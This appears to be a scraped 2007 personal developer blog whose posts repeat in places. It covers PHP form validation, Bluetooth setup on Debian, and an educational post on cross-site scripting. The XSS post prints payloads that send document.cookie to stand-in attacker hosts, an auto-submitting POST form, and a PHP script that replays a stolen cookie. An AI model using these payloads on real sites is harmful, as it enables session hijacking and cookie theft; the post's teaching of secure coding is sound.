for web development i think you should move with a fixed price for the time period. once you get the time estimation from the project manager make sure your developers / designers doesn't take more time than expected to finish a job. because this field is so competitive, you have to deliver projects on time to keep up in the business. and a good process should be defined to gather client requirements and the project spec, and you have to make sure not to adopt to any change requests from the customer till you finish the first release.
and at the same time you have to make sure that you have a sound Quality Assurance process to make sure that the deliverables are exact to the client requirements.
Thursday, August 09, 2007
Thursday, June 14, 2007
filter.php
This is my newest solution on form submit data validation. it was developed in a "developer point of view" rather than "end user point of view". so if you don't have any idea about php development then you'll find it bit difficult to understand. but once you got to know the pattern u'll be loving it and of course you'll be using it to validate all your form submissions.
first we'll see what type of things do we have to validate as HTML form elements.
and one other cool feature of this script is that you can keep the default values of other elements even though one element fail to validate. and it may sounds like a very common and lazy task with javascript enabled pages but remember this snippet will validate and keep the default values nicely even without no javascript at all.
does that sounds interesting?
first we'll see what type of things do we have to validate as HTML form elements.
- textfield
- textarea
- checkbox
- radio button
- radio group
- List / Menu
- file field
and one other cool feature of this script is that you can keep the default values of other elements even though one element fail to validate. and it may sounds like a very common and lazy task with javascript enabled pages but remember this snippet will validate and keep the default values nicely even without no javascript at all.
does that sounds interesting?
Monday, June 11, 2007
The Big Day Coming ahead on friday
ya it will be a big day for me becouse friday i have to conduct my first technical session to all my collegues at accura-tech. even though they have given me the title of software engineer im currently educating all other developers about new technologies.
so by friday evening i should prepare myself to conduct this technical session on user input validation. hopefully this will be the first in the row of web security which is one of my favourite topics.
i have already designed and checked the validation code which i will be using to demonstrate the impact.
i'll update this blog with a photo (if available) and the neccessary files once im done with this.
and i know that surely there will be lot of ideas coming in from our developers too. so i'll try to post it back to the blog.
--
Praveen Gunasekara
so by friday evening i should prepare myself to conduct this technical session on user input validation. hopefully this will be the first in the row of web security which is one of my favourite topics.
i have already designed and checked the validation code which i will be using to demonstrate the impact.
i'll update this blog with a photo (if available) and the neccessary files once im done with this.
and i know that surely there will be lot of ideas coming in from our developers too. so i'll try to post it back to the blog.
--
Praveen Gunasekara
Wednesday, May 30, 2007
vote for drupal
Drupal has been selected as a finalist by the editors at CNet Webware in the first ever “Webware 100” Awards, from over 4,000 user-submitted nominations. Winners will be announced on Monday, June 18 and posted on Webware.com.
Voting is NOW OPEN, and will remain so until June 11. So please, vote for Drupal!
Monday, May 14, 2007
installing bluetooth manager on my debian laptop
i just wanted to install some kind of bluetooth connection manager in my laptop, coz i had some files to be transfered from my mobile to laptop. my laptop is a compaq presario m2000 and i'm using debian(my favourite OS) on it.
first i installed bluez-utils package.
apt-get install bluez-utils
then i conected the bluetooth dongle and ran hciconfig .
hci0: Type: USB
BD Address: 00:11:67:1D:ED:DC ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING PSCAN
RX bytes:4816991 acl:18400 sco:0 events:7524 errors:0
TX bytes:657600 acl:7361 sco:0 commands:71 errors:0
so with the previous result i knew that the dongle is recongnized and then i wanted to scan for new devices. then i turned on blutooth in my mobile phone(sony ericcson k750i).
then i executed hcitool scan and it gave me following result.
praveen-laptop:/home/praveen/Desktop/Downloads# hcitool scan
Scanning ...
00:18:13:4F:4A:61 Praveen K750i
00:03:7A:E0:9B:EE CHANDIKA
00:17:4B:D4:29:56 Chandika Nokia 6630
now it seems that i can connect into the phone. so i wanted to know
some more information about my mobile so i ran hcitool information 00:18:13:4F:4A:61 and gave me the following result.
Requesting information ...
BD Address: 00:18:13:4F:4A:61
Device Name: Praveen K750i
LMP Version: 1.2 (0x2) LMP Subversion: 0x41c
Manufacturer: Philips Semiconductors (37)
Features: 0xff 0xed 0x8d 0xf8 0x1a 0x08 0x00 0x00
<3-slot> <5-slot> ....
then i installed gnome-bluetooth debian package. so i selected tuxfamily.org to download it, so i had to update the sources.list which resides at /etc/apt/sources.list .
deb-src http://download.tuxfamily.org/osrdebian unstable gnome-bluetooth
i added the following two lines. then i tried to update apt but it seems that you need a public key to access the newly added sources.
so then i ran
wget http://download.tuxfamily.org/osrdebian/61B8DB62.gpg -O- | sudo apt-key add -
to add the key to the apt trusted key list.
hard work is over it seems. then i ran apt-get install gnome-bluetooth in order to install gnome-bluetooth
when the install completed there was new button appearing under
applications ->accessories -> bluetooth file sharing.
when i clicked on it. the service got started and then i tried to send an image file to the laptop from my mobile and it worked.
wooow, at last.
but to send files from my laptop to mobile i still have to use the command gnome-obex-send which opens a new window asking to which device i want to send the file.
thats well done.
i'm catching up and living with linux.
first i installed bluez-utils package.
apt-get install bluez-utils
then i conected the bluetooth dongle and ran hciconfig .
hci0: Type: USB
BD Address: 00:11:67:1D:ED:DC ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING PSCAN
RX bytes:4816991 acl:18400 sco:0 events:7524 errors:0
TX bytes:657600 acl:7361 sco:0 commands:71 errors:0
so with the previous result i knew that the dongle is recongnized and then i wanted to scan for new devices. then i turned on blutooth in my mobile phone(sony ericcson k750i).
then i executed hcitool scan and it gave me following result.
praveen-laptop:/home/praveen/Desktop/Downloads# hcitool scan
Scanning ...
00:18:13:4F:4A:61 Praveen K750i
00:03:7A:E0:9B:EE CHANDIKA
00:17:4B:D4:29:56 Chandika Nokia 6630
now it seems that i can connect into the phone. so i wanted to know
some more information about my mobile so i ran hcitool information 00:18:13:4F:4A:61 and gave me the following result.
Requesting information ...
BD Address: 00:18:13:4F:4A:61
Device Name: Praveen K750i
LMP Version: 1.2 (0x2) LMP Subversion: 0x41c
Manufacturer: Philips Semiconductors (37)
Features: 0xff 0xed 0x8d 0xf8 0x1a 0x08 0x00 0x00
<3-slot> <5-slot> ....
deb-src http://download.tuxfamily.org/osrdebian unstable gnome-bluetooth
i added the following two lines. then i tried to update apt but it seems that you need a public key to access the newly added sources.
so then i ran
wget http://download.tuxfamily.org/osrdebian/61B8DB62.gpg -O- | sudo apt-key add -
to add the key to the apt trusted key list.
hard work is over it seems. then i ran apt-get install gnome-bluetooth in order to install gnome-bluetooth
when the install completed there was new button appearing under
applications ->accessories -> bluetooth file sharing.
when i clicked on it. the service got started and then i tried to send an image file to the laptop from my mobile and it worked.
wooow, at last.
but to send files from my laptop to mobile i still have to use the command gnome-obex-send
thats well done.
i'm catching up and living with linux.
Monday, April 23, 2007
XSS Attack
Cross site scripting(XSS) is relatively common problem in web application security but they are extremely dangerous. Rather than attacking the server directly they user a vulnerable web page to attack one of its users. This can lead to extreme difficulty in tracking attackers, when requests are not fully logged. Lets go in deep and find out how an vulnerable web page leads to an XSS attack? And how to make sure that there are no space left for XSS attack in the web sites we develop.
Then lets see how an XSS attack works? XSS attacks are results of flaws in server side web applications (that’s what we do…) and are rooted in user inputs which are not properly validated. For a example think about a PHP page named hello.php which is used to echo a parameter send to that file.
If you simply pass
hello.php?name=Praveen Gunasekara
Then the page will give you the expected result of printing the name. but guess what will happen if we send HTML tags on that request. For example.
hello.php?name=<ul><li>Praveen</li><li>Gunasekara</li></ul>
the input is not validated by the script before rendering by the victim’s web browser. And think about situations where we save the un-validated parameters into a database or a binary file and retrieved later to rendered on the page.
for the moment you might be wondering so what is Risk involved? think if the attacker can pass HTML tags it means he can easily pass <script> tags. then lets discuss how the attack works. as we all know we only submit data either by GET or the POST method. attacking through the GET method is the easiest and at the same time noisiest. because all most every web server logs all its URI requests.
so the simplest thing an attacker can do with javascript is to change the location of the window.
hello.php?name=<script>document.location.replace('http://attack/spam')</script>
but with the nature of XSS attacks the attacker him self cannot do any harms to other users. what he can only do is to wait till someone else connects to that page. so when someone else clicks in to this page he will be automatically redirected to some other page.
and now think about hi-jacking the user's whole session with this kind of attack. it's not harder as it sounds. what the attacker has to do is just to change the href of a particular link.
hello.php?name=<script>document.location.replace('http://attack/spam?c='%2Bdocument.cookie)</script>
so now you might say that the POST method is far more safer because the end user cannot see the parameters we are parsing from the script.
you are wrong. it is bit harder to attack on POST method. because to do that you need an intermediate web page having those parameters which are identically same to the form on the original page. for example,
<form name=f method=POST action=”http://host/hello.php”>
<input type=hidden name=”name” value=”<script>document.location.replace(‘http://attacker/payload?c=’+document.cookie)≪/script>”>
</form>
<script>f.submit()</script>
and rather than jumping the code, he might decide to change the look and feel and layout of the web page thats being attacked. but once he redirects the page to his own page there are several harmful things that can be done. for example the following code can log visitors IP, reffer and the sensitive information saved on the header.
and once the attacker has the list of IP's and cookies, he can write an automated script to connect to the IP with that session details, and to change the sensitive information there. the code below shows how to download the source code of a PHP file in the server.
<?php
$request = "GET /secret.php HTTP/1.0\r\n";
$request .= "Cookie: {$HTTP_GET_VARS['c']}\r\n";
$request .= "\r\n";
$s = fsockopen("host", 80, $errno, $errstr, 30);
fputs($s, $request);
$content = '';
while (!feof($s))
{
$content .= fgets($s, 4096);
}
fclose($s);
echo $content;
?>
and following example code shows how override a PHP file in the server.
so finally i hope everyone of us understood how dangerous XSS attacks can be and how we should write our web application with much more security capable.
Praveen Gunasekara.
Then lets see how an XSS attack works? XSS attacks are results of flaws in server side web applications (that’s what we do…) and are rooted in user inputs which are not properly validated. For a example think about a PHP page named hello.php which is used to echo a parameter send to that file.
If you simply pass
hello.php?name=Praveen Gunasekara
Then the page will give you the expected result of printing the name. but guess what will happen if we send HTML tags on that request. For example.
hello.php?name=<ul><li>Praveen</li><li>Gunasekara</li></ul>
the input is not validated by the script before rendering by the victim’s web browser. And think about situations where we save the un-validated parameters into a database or a binary file and retrieved later to rendered on the page.
for the moment you might be wondering so what is Risk involved? think if the attacker can pass HTML tags it means he can easily pass <script> tags. then lets discuss how the attack works. as we all know we only submit data either by GET or the POST method. attacking through the GET method is the easiest and at the same time noisiest. because all most every web server logs all its URI requests.
so the simplest thing an attacker can do with javascript is to change the location of the window.
hello.php?name=<script>document.location.replace('http://attack/spam')</script>
but with the nature of XSS attacks the attacker him self cannot do any harms to other users. what he can only do is to wait till someone else connects to that page. so when someone else clicks in to this page he will be automatically redirected to some other page.
and now think about hi-jacking the user's whole session with this kind of attack. it's not harder as it sounds. what the attacker has to do is just to change the href of a particular link.
hello.php?name=<script>document.location.replace('http://attack/spam?c='%2Bdocument.cookie)</script>
so now you might say that the POST method is far more safer because the end user cannot see the parameters we are parsing from the script.
you are wrong. it is bit harder to attack on POST method. because to do that you need an intermediate web page having those parameters which are identically same to the form on the original page. for example,
<form name=f method=POST action=”http://host/hello.php”>
<input type=hidden name=”name” value=”<script>document.location.replace(‘http://attacker/payload?c=’+document.cookie)≪/script>”>
</form>
<script>f.submit()</script>
and rather than jumping the code, he might decide to change the look and feel and layout of the web page thats being attacked. but once he redirects the page to his own page there are several harmful things that can be done. for example the following code can log visitors IP, reffer and the sensitive information saved on the header.
and once the attacker has the list of IP's and cookies, he can write an automated script to connect to the IP with that session details, and to change the sensitive information there. the code below shows how to download the source code of a PHP file in the server.
<?php
$request = "GET /secret.php HTTP/1.0\r\n";
$request .= "Cookie: {$HTTP_GET_VARS['c']}\r\n";
$request .= "\r\n";
$s = fsockopen("host", 80, $errno, $errstr, 30);
fputs($s, $request);
$content = '';
while (!feof($s))
{
$content .= fgets($s, 4096);
}
fclose($s);
echo $content;
?>
and following example code shows how override a PHP file in the server.
so finally i hope everyone of us understood how dangerous XSS attacks can be and how we should write our web application with much more security capable.
Praveen Gunasekara.
My technorati profile
so today i've signed up for a new account at technorati. this is the link to my profile page.
My Technorati Profile
lets see how this going to help me out.
~Praveen Gunasekara
My Technorati Profile
lets see how this going to help me out.
~Praveen Gunasekara
Subscribe to:
Comments (Atom)